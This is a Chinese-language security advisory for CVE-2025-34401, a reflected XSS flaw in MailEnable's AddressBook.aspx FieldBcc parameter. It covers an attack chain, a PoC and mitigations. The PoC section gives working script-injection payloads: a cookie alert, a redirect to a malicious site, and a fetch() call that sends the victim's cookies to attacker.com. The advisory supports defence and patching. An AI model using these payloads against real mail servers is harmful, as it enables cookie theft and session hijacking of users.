IPBUF安全漏洞报告
English
CVE-2025-34401 CVSS 6.1 中危

CVE-2025-34401 MailEnable AddressBook.aspx 反射型XSS漏洞

披露日期: 2025-12-09

漏洞信息

漏洞编号
CVE-2025-34401
漏洞类型
反射型XSS
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
MailEnable

相关标签

MailEnable反射型XSSCVE-2025-34401跨站脚本邮件服务器AddressBook.aspx

漏洞概述

CVE-2025-34401是MailEnable邮件服务器中一个反射型跨站脚本(XSS)漏洞。该漏洞存在于/Mondo/lang/sys/Forms/AddressBook.aspx页面的FieldBcc参数中,攻击者可以通过构造恶意链接诱使受害者访问,从而在受害者浏览器中执行任意JavaScript代码。由于该漏洞无需认证即可利用,且影响邮件正常撰写流程,攻击者可窃取用户cookies(包括非HttpOnly cookies)、重定向用户至恶意网站、注入任意HTML或CSS内容,甚至以受害者身份执行操作,对用户和企业安全造成威胁。CVSS评分6.1,属于中等严重程度。

技术细节

该漏洞为反射型XSS,攻击原理如下:1) FieldBcc参数值在通过GET请求处理时未被正确消毒;2) 用户输入被直接反射到<script>块内的JavaScript变量var BCCFieldProvided中;3) 攻击者可通过构造恶意载荷终止现有的LoadCurAddresses()函数,插入攻击者控制的脚本,并注释掉剩余代码;4) 当受害者正常撰写邮件时访问恶意链接,即可在其浏览器上下文中执行任意JavaScript。攻击成功的前提条件是用户访问攻击者构造的恶意链接,且漏洞存在于邮件系统的地址簿功能中,涉及邮件撰写这一高频率操作场景。

攻击链分析

STEP 1
步骤1
攻击者构造恶意XSS载荷,通过终止LoadCurAddresses()函数、插入恶意脚本、注释剩余代码的方式
STEP 2
步骤2
攻击者将包含恶意载荷的URL伪装成钓鱼链接,通过邮件、聊天等方式诱导受害者点击
STEP 3
步骤3
受害者访问恶意链接后,恶意载荷被反射到页面<script>标签内的JavaScript变量中
STEP 4
步骤4
恶意JavaScript在受害者浏览器中执行,可窃取cookies、重定向用户或执行任意操作
STEP 5
步骤5
攻击者利用窃取的认证信息或会话令牌进一步渗透系统或进行其他恶意活动

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
var xss_payload = '</script><script>alert(document.cookie)</script>//'; var poc_url = 'https://target.com/Mondo/lang/sys/Forms/AddressBook.aspx?FieldBcc=' + encodeURIComponent(xss_payload); console.log('PoC URL:', poc_url); // Alternative payload to steal cookies var cookie_steal = '</script><script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; // Alternative payload for redirection var redirect = '</script><script>window.location="https://malicious-site.com"</script>'; // Base PoC for testing var base_poc = 'http://vulnerable-server/Mondo/lang/sys/Forms/AddressBook.aspx?FieldBcc=</script><script>alert("XSS")</script>//';

影响范围

MailEnable < 10.54

防御指南

临时缓解措施
在官方补丁发布前,可采取以下临时缓解措施:1) 部署WAF规则过滤包含</script>标签和javascript:协议的请求参数;2) 禁用或限制AddressBook.aspx页面的访问;3) 提醒用户不要点击来源不明的链接;4) 监控Web服务器日志中的异常请求模式;5) 考虑临时禁用邮件系统的地址簿功能。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表